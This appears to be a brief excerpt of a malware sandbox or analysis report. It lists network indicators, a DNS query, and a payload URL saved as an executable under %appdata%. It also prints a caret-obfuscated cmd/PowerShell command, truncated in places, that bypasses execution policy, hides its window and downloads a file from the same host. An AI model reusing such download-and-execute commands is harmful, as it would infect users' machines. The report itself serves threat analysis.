Technical Information
- http://smoeroota.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWer^Sh^eL^l^.ExE -exe^CUTI^oN^pol^I^c^y ^BY^PAss^ -^NOPr^O^fI^lE^ ^-wi^N^DO^ws^ty^L^e^ H^idDeN (N^e^w-o^b^je^c^T ^s^Y^s^t^e^m^.^Net.^webc^Li^En^t)^.^D^oWnl^oAD^FIL^E('http://smoe...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "poWer^Sh^eL^l^.ExE -exe^CUTI^oN^pol^I^c^y ^BY^PAss^ -^NOPr^O^fI^lE^ ^-wi^N^DO^ws^ty^L^e^ H^idDeN (N^e^w-o^b^je^c^T ^s^Y^s^t^e^m^.^Net.^webc^Li^En^t)^.^D^oWnl^oAD^FIL^E('http://smoe...' (with hidden window)